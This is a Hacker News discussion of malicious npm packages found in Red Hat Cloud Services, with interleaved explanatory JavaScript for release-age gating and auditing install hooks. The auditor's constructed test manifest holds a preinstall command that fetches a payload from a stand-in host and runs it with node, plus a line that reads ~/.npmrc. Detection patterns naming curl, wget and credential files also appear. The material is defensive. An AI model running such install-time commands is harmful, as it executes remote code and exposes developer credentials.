Malicious npm packages detected across Red Hat Cloud Services

kurmiashish 740 points 421 comments June 01, 2026
github.com · View on Hacker News

Discussion Highlights (20 comments)

jofzar

'No Way to Prevent This,' Says Only Package Manager Where This Regularly Happens

Edit: some people don't understand that it's a defence to https://en.wikipedia.org/wiki/%27No_Way_to_Prevent_This,%27_...

buckle8017

Red Hat's entire reason for existence is to prevent this.

dmix

Our company uses Yarn 4, which has an option to prevent you from installing an npm package for the first few days after its release. Most of these seem to be caught within that timeframe (1-3 days). https://gist.github.com/mcollina/b294a6c39ee700d24073c0e5a4e...

freakynit

Lol.. yet again npm and install-scripts abuse at play.

Updated:

1. All exploitation techniques used since May 2025: https://npm-supply-chain-attack-techniques.pagey.site/
2. All attacks that happened since May 2025: https://npm-supply-chain-attacks-25-26.pagey.site/

indy

This is a completely unexpected turn of events that no one could have possibly foreseen.

m3kw9

At some point they need a new system for these "packages"; you've got to be insane to install any of these right now.

arianvanp

Given they use Nx, my bet is on developer laptop compromise through the Nx VS Code extension that also compromised a GitHub engineer's laptop.

gbuk2013

I came across this interesting rant the other day: https://github.com/uNetworking/uWebSockets.js/blob/master/mi... It does make sense that the right way would be to fork every dependency you use and install from your own repo reviewing and merging from upstream as needed. Would be a giant PITA though. :)

what_hn

Same actors again?

rvz

This repository itself previously had to update because of the axios supply chain attack [0] (co-authored by Claude lol). But just by looking at the change itself, the package is unpinned and won't solve the problem if another malicious "security update" happens again. So if you have an unpinned version of this package and you run 'npm install', you immediately download the compromised version and that's that.

[0] https://github.com/RedHatInsights/javascript-clients/commit/...

general_reveal

That’s why I switched to Java.

paulbjensen

Looks like RedHat got compromised by a Black Hat…

phishin

Chainguard-based images, packages and libraries are the first line of defense. Expensive? Yes. Foolproof? No. I think these types of services will be mandatory in the near future.

king_zee

I've made it a habit now to use the --before=2026-05-30 flag when installing packages, where it'll pick the version released before the date you specify. I usually pick around 5 days ago.
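The two mitigations mentioned above (Yarn's age gate and npm's `--before` flag) do the same thing: resolve against registry metadata while refusing any version published after a cutoff. The following is an added example, not code from the thread or from any package manager, that implements that selection over the registry's packument `time` map; the package name, versions and timestamps are constructed for illustration, and `example-client-sdk` is a hypothetical name.

```javascript
// Added example: a "minimum release age" gate over npm registry metadata.
// It mimics what `npm install --before=<date>` and Yarn/pnpm age gates do:
// ignore any version published more recently than a cutoff, so a freshly
// pushed malicious release is not resolved automatically.
// The packument below is CONSTRUCTED; name, versions and dates are hypothetical.

const DAY_MS = 24 * 60 * 60 * 1000;

// Parse a strict x.y.z version; returns null for prereleases and non-version keys.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v);
  return m ? m.slice(1).map(Number) : null;
}

function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

// Pick the highest stable version whose publish time is at or before `cutoff`.
// `packument.time` maps each version (plus "created"/"modified") to an ISO date,
// as the registry's /<name> document does.
function selectVersionBefore(packument, cutoff) {
  const cutoffMs = cutoff.getTime();
  let best = null;
  for (const [version, published] of Object.entries(packument.time)) {
    if (!parseVersion(version)) continue;            // skip "created"/"modified", prereleases
    if (!(version in packument.versions)) continue;  // unpublished versions keep a time entry
    if (Date.parse(published) > cutoffMs) continue;  // too new: gated out
    if (best === null || compareVersions(version, best) > 0) best = version;
  }
  return best;
}

// "Nothing younger than N days", relative to `now` (what an age gate enforces).
function selectWithMinimumAge(packument, now, minDays) {
  return selectVersionBefore(packument, new Date(now.getTime() - minDays * DAY_MS));
}

// Constructed registry metadata: 1.4.2 plays the malicious release pushed one
// day before "now"; 1.4.1 is the known-good version. 1.3.9 was unpublished
// (time entry but no versions entry) and 1.5.0-rc.1 is a prerelease.
const NOW = new Date('2026-06-01T00:00:00Z');
const EXAMPLE_PACKUMENT = {
  name: 'example-client-sdk',
  'dist-tags': { latest: '1.4.2' },
  versions: { '1.4.0': {}, '1.4.1': {}, '1.4.2': {}, '1.5.0-rc.1': {} },
  time: {
    created: '2026-01-10T00:00:00Z',
    modified: '2026-05-31T00:00:00Z',
    '1.3.9': '2026-04-01T00:00:00Z',
    '1.4.0': '2026-05-02T00:00:00Z',
    '1.4.1': '2026-05-22T00:00:00Z',
    '1.4.2': '2026-05-31T00:00:00Z',
    '1.5.0-rc.1': '2026-05-30T00:00:00Z',
  },
};

console.log('no gate              ->', selectWithMinimumAge(EXAMPLE_PACKUMENT, NOW, 0));
console.log('5-day gate           ->', selectWithMinimumAge(EXAMPLE_PACKUMENT, NOW, 5));
console.log('--before=2026-05-20  ->',
  selectVersionBefore(EXAMPLE_PACKUMENT, new Date('2026-05-20T00:00:00Z')));
```

The gate buys time, nothing more: a compromised version that sits unnoticed for longer than the window is resolved as normal, and nothing here checks the tarball's integrity. It belongs alongside a committed lockfile with exact versions and integrity hashes, which is the part the unpinned fix discussed above was missing.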

Sudhanshu2310

We have done the complete analysis and there are 32 packages that share the same publishing pipeline. https://safedep.io/redhat-cloud-services-hit-by-mini-shai-hu...

voidUpdate

One thing I've never understood is why npm allows packages to run code immediately after they are installed. What's the use case for that? A package should just be some code you can call on at runtime.
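What actually runs is the `preinstall`, `install` and `postinstall` (and, for git dependencies, `prepare`) entries of each dependency's `package.json`, executed with the installing user's shell and environment. The following is an added example, not code from the thread or from npm, that inspects a set of manifests for such hooks and flags command patterns typical of install-time droppers; the three manifests and their commands are constructed, and the package names are hypothetical.

```javascript
// Added example: audit which packages would execute code during `npm install`.
// Each object below stands in for one node_modules/<name>/package.json; in
// practice you would read those files and pass the parsed objects here.
// The manifests are CONSTRUCTED; names and commands are hypothetical.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristics only: an honest native build usually invokes node-gyp, whereas
// fetching or decoding a payload and reading credential files are red flags.
const SUSPICIOUS = [
  { name: 'remote fetch',     re: /\b(curl|wget)\b/ },
  { name: 'encoded payload',  re: /\bbase64\b|\batob\(|Buffer\.from\([^)]*['"]base64['"]/ },
  { name: 'dynamic eval',     re: /\beval\(|new Function\(/ },
  { name: 'secret env var',   re: /\$\{?(NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET_ACCESS_KEY)\b/ },
  { name: 'credential files', re: /\.npmrc|\.ssh\/|\.aws\/|\.git-credentials/ },
];

// Report one manifest: which install hooks it declares and what they match.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  const hooks = INSTALL_HOOKS.filter((h) => typeof scripts[h] === 'string');
  const findings = [];
  for (const hook of hooks) {
    for (const { name, re } of SUSPICIOUS) {
      if (re.test(scripts[hook])) findings.push(`${hook}: ${name}`);
    }
  }
  return { name: manifest.name, version: manifest.version, hooks, findings };
}

// Keep only packages that run something at install time, worst first.
function auditInstallScripts(manifests) {
  return manifests
    .map(auditManifest)
    .filter((r) => r.hooks.length > 0)
    .sort((a, b) => b.findings.length - a.findings.length);
}

const CONSTRUCTED_MANIFESTS = [
  { name: 'plain-lib', version: '2.0.0', scripts: { test: 'node test.js' } },
  { name: 'native-addon', version: '1.1.0', scripts: { install: 'node-gyp rebuild' } },
  {
    name: 'example-client-sdk',
    version: '1.4.2',
    scripts: {
      preinstall: 'curl -s https://example.invalid/x | base64 -d | node -',
      postinstall: 'node -e "require(\'child_process\').exec(\'cat ~/.npmrc\')"',
    },
  },
];

for (const r of auditInstallScripts(CONSTRUCTED_MANIFESTS)) {
  const verdict = r.findings.length ? `FLAGGED (${r.findings.join('; ')})` : 'runs a hook, nothing matched';
  console.log(`${r.name}@${r.version} [${r.hooks.join(',')}] ${verdict}`);
}
```

Pattern matching catches only the lazy droppers; an obfuscated hook or one that downloads a second stage from a clean-looking URL will pass. The robust answer to the question above is to not run the hooks at all: set `ignore-scripts=true` in the project `.npmrc` and rebuild the handful of native packages explicitly, so the list this audit prints is the same list you have consciously approved.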

shrikant

Oooh now I'm wondering if this may have contributed to their Docker image distribution service getting disrupted earlier today... https://status.redhat.com/incidents/jn6r256zc62c

bobkb

When will npm issues stop? This has become a big pain!

kitd

Hmm, same day as RH and IBM announce Project Lightwell to help detect and fix supply chain vulns. https://www.redhat.com/en/lightwell

tetsgima

Man, we gotta do something with preinstall hooks at this point.
